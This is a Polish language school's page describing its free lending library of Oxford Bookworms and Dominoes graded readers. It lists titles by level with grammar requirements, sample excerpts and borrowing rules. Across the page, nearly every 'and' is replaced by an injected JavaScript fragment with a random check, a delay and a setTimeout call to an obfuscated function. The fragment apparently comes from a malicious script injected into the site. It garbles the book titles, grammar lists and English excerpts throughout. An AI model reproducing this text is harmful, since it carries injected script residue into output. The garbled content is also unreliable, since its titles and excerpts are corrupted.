Szkoła Językowa Doorway zgromadziła do tej pory mnóstwo ksiażek, które byly do dyspozycji naszych uczniów od momentu otwarcia szkoły. Obecnie udostępnilismy naszą bibliotekę również dla osób z zewnątrz, a to oznacza, że każdy, kto chciałby poprawić swój angielski, a nie jest naszym uczniem, może przyjść i pożyczyć taką książkę bez zadnych kosztów.

Nasza biblioteka

Oxford Bookworms

Oxford Bookworms

W naszej bibliotece znajdują się dwa typy książek opracowane przez wydawnictwo Oxford University Press – Oxford Bookworms oraz Oxford Dominoes Serie te są przystosowane dla osób o różnym stopniu zaawansowania języka – ich orginalny tekst został zmieniony tak, aby czytanie/rozumienie było prostsze dla osób o różnych umiejętnościach językowych. Do większości książek z obu serii dołączone są płyty CD (audiobooki), dzieki ktorym można posłuchać naturalnej mowy angielskiej, a tym samym cwiczyć sprawność rozumienia ze słuchu.
Seria Oxford Bookworms to książki skoncentrowane na klasyce literatury i dlatego są najodpowiedniejsze dla młodzieży i dorosłych. Seria Dominoes natomiast jest bardzo kolorowa i interaktywna, na końcu każdego rozdziału znalezć można ćwiczenia, co sprawia, ze najchetniej siegają po nia dzieci i  mlodzież. Do książek z tej serii dołączane są płyty MultiRom z dodatkowymi ćwiczeniami utrwalającymi.

 

Nasze książki

Poniżej znajdują się przykładowe książki z naszej biblioteki, sklasyfikowane według poziomów:

Starter

The Happy Prince

The Happy Prince

Escape (z audio CD)
Mulan
The Happy Prince (z audio CD)
Tristan i Isolde (z audio CD)
Journey to the Centre of the Earth
The Selfish Giant
Ali Baba andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and the Forty Thieves
The Little Match Girl
Perseus (z audio CD)
The Girl with Green Eyes – NOWY
Robin Hood – NOWY

Wymagana znajomość około 250 słów oraz konstrukcji gramatycznych tj. Present Simple, Present Continuous, Imperatives, can/cannot andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and must, going to (for the future) andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Gerunds.

Przykładowy fragment:

Her phone is ringing – but where is it?

Sally gets out of bed andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and looks at her bag. No phone. She looks under her bed. No phone. Then she looks behind the door. There is her phone. Sally picks up her phone andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and answers it.
Sally’s Phone

Stage 1

The Monkey'S Paw

The Monkey’S Paw

The Elephant Man
The Monkey’s Paw (z audio CD)
One-Way Ticket (Short Stories) (z audio CD)
Little Lord Faunteleroy (z audio CD)
The Wrong Trousers
Pollyana (z audio CD)
Twenty Leagues Under the Sea (z audio CD)
The Ski Race
White Death
Les Miserables (z audio CD)
William andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Kate (z audio CD)
A Little Princess – NOWY
Shirley Holmes andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and the Lithuanian Case – NOWY

Wymaga się znajomości około 400 słów oraz konstrukcji gramatycznych (wszystkie wymienione powyżej plus…) Past Simple, conjunctions, the prepositions ‘before, after, when, because’ andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and ‘so.’

Przykładowy fragment:

I knew him in Persia. He was a famous builder andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and I knew him there. For a time I was his friend, but not for long. When he came to Paris, I came after him – I wanted to watch him. He was a very clever, very dangerous man.
The Phantom of the Opera

Aby usłyszeć przykład zapisu audio na poziomie 1, kliknij The Little Hunters at the Lake.

Stage 2

Hamlet
Much Ado About Nothing
Romeo andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Juliet
Agatha Christie – Woman of Mystery (z audio CD)
Alice’s Adventures in Wonderlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and (z audio CD)
Anna of Green Gables (z audio CD)
The Canterville Ghost
The Children of the new Forest (z audio CD)
Death in the Freezer (z audio CD)
Grace Darling (z audio CD)
The Jungle Book (z audio CD)
The Mystery of Allegra
New Yorkers (Short Stories) (z audio CD)
Voodoo Islandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and (z audio CD)
The Murders in the Rue Morgue (z audio CD)
Love among the Haystacks
The Black Tulip
Sherlock Holmes: The Norwood Mystery (z audio CD)
A Close Shave (z audio CD)
Emma (z audio CD)
William Shakespeare (z audio CD)
The Piano (z audio CD)
Robinson Crusoe – NOWY

Wymaga się znajomości około 700 słów oraz konstrukcji gramatycznych (wszystkie wymienione powyżej plus…) Present Perfect Simple, will (for the future), have to/don’t have to, must not, could, Comparisons, basic if- clauses, Past Continuous, Question Tags, ‘ask’ andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and ‘tell.’

Przykładowy fragment:

While i was writing these words in my diary, I decided what to do. I must try to escape. I shall try to get down the wall outside. The window is high above the ground, but I have to try. I shall take some of the gold with me – if I escape, it will be helpful later.
Dracula

Aby usłyszeć przykład zapisu audio na poziomie 2, kliknij  Callus.

Stage 3

Go, Lovely Rose

Go, Lovely Rose

As the Inspector Said andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and other stories
The Card
Go, Lovely Rose
The Prisoner of Zenda (z audio CD)
Tales of Mystery andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Imagination (z audio CD)
A Cup of kindness (Stories from Scotlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and)
Leaving No Footprint (Stories from Asia)
Playing with Fire (Stories from the Pacific Rim)
Don’t Tell Me What to Do
Love by Design
Free Time around the World
The Last of the Mochicans (z audio CD)
The Count of Monte Cristo (z audio CD)
The Curious Case of Benjamin Button andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and other Short Stories (z audio CD)
The Chemical Secret (z audio CD)
A Christmas Carol (z audio CD)
The Wind in the Willow
Ethan Frome – NOWY
Kidnapped – NOWY

Wymaga się znajomości około 1000 słów oraz konstrukcji gramatycznych (wszystkie wymienione powyżej plus…) should/may, Present Perfect Continuous, used to…, Past Perfect Simple, Causatives, Relative Clauses andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Indirect Statements.

Przykładowy fragment:

Of course it was most important that no one should see Colin, Mary or Dickon entering the secret garden. So Colin gave orders to the gardeners that they must all keep away from that part of the garden in the future.
The Secret Garden

Aby usłyszeć przykład zapisu audio na poziomie 3, kliknij A Gathering of Bald Men.

Stage 4

The Silver Sword

The Silver Sword

The African Queen
Black Beauty (z audio CD)
Gulliver’s Travels (z audio CD)
Mr. Midshipman Hornblower
Silas Marner (z audio CD)
The Silver Sword
A Tale of Two Cities
The Thirty-Nine Steps
Three Men in a Boat
Treasure Islandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and
The Whispering Knights
Doors to a Wider Place (Stories from Australia)
Machines Then andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Now (z audio CD)
Incredible Earth (z audio CD)
The Eagle of the Ninth
Dr Jeckyll andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Mr Hyde (z audio CD)
Death of an Englishman – NOWY
The Moonspinners – NOWY
Cranford – NOWY
Lorna Doone – NOWY

Wymaga się znajomości około 1400 słów oraz konstrukcji gramatycznych (wszystkie wymienione powyżej plus…) Past Perfect Continuous, simple Passives, would andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and  2nd Conditionals, Indirect Questions, Relative Clauses with ‘where’ andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and ‘when.’

Przykładowy fragment:

I was glad. Now Hyde could not show his face to the world again. If he did, every honest man in London would be proud to report him to the police.
Dr. Jekyll andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Mr. Hyde

Aby usłyszeć przykład zapisu audio na poziomie 4, kliknij For A Horseshoe Nail.

Stage 5

Wuthering Heights

Wuthering Heights

The Age of Innocence (z audio CD)
Brat Farrar
The Bride Price
David Copperfield
Far from the Madding Crowd
The Garden Party andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and other Stories (z audio CD)
Ghost Stories
Great Expectations
Wuthering Heights (z audio CD)
Sense andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Sensibility (z audio CD)
Slumdog Millionaire (z audio CD)

Jurassic Park
All About Islandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ands (z audio CD)
The Great Gatsby (z audio CD)
This Rough Magic
Heat andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Dust
Deadlock
The Riddle of the Sandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ands – NOWY

Wymaga się znajomości około 1800 słów oraz konstrukcji gramatycznych (wszystkie wymienione powyżej plus…) Future Continuous, Future Perfect, Passives (with Modals andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Continuous Forms), would have andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and 3rd Conditionals, Modals + perfect infinitives (has to have seen…).

Przykładowy fragment:

 If he had spoken Estalla’s name, I would have hit him. I was so angry with him, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and so depressed about my future, that I could not eat the breakfast. Instead I went straight to the old house.
Great Expectations

Stage 6

Gazing at the Stars (Stories from Asia)

Gazing at the Stars (Stories from Asia)

Tess of the D’Urbervilles
Vanity Fair (z audio CD)
Gazing at the Stars (Stories from Asia) (z audio CD)
Of Mice andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Men
Food around the World (z audio CD)
Caring for our Planet (z audio CD)
Decline andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Fall
American Crime Stories (z audio CD)
The Woman in White
Jane Eyre
Dublin People
The Fly andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Other Horror Stories

Wymaga się znajomości około 2500 słów oraz konstrukcji gramatycznych (wszystkie wymienione powyżej plus…) Passives (plus Modals andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and  Perfect Infinitives), advanced modal meanings, clauses of concession andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and advanced conditionals.

Przykładowy fragment:

When I stepped up to the piano, I was confident. It was as if I knew that the prodigy side of me really did exist. And when I started to play, I was so caught up in how lovey I looked that I didn’t worry how I would sound.
The Joy Luck Club

Jak zacząć

Jak pożyczać? Wystarczy, że wstąpisz do naszego biura i zapytasz o możliwość obejrzenia zbiorów bibliotecznych. Nasza sekretarka pokaże ci, które książki są aktualnie dostępne i będziesz mógł wybrać tę, która podoba ci się najbardziej. Po wybraniu książki zostaniesz poproszony o dane kontaktowe (numer telefonu, adres mailowy) oraz o pozostawienie 20 zł kaucji, która będzie zwracana w momencie oddania książki. To proste, prawda? Możesz również pożyczyć więcej niż jedną książkę w tym samym momencie. Jednakże, należy pamiętać, że pozostawiona kaucja jest mnożona przez ilość pożyczanych książek.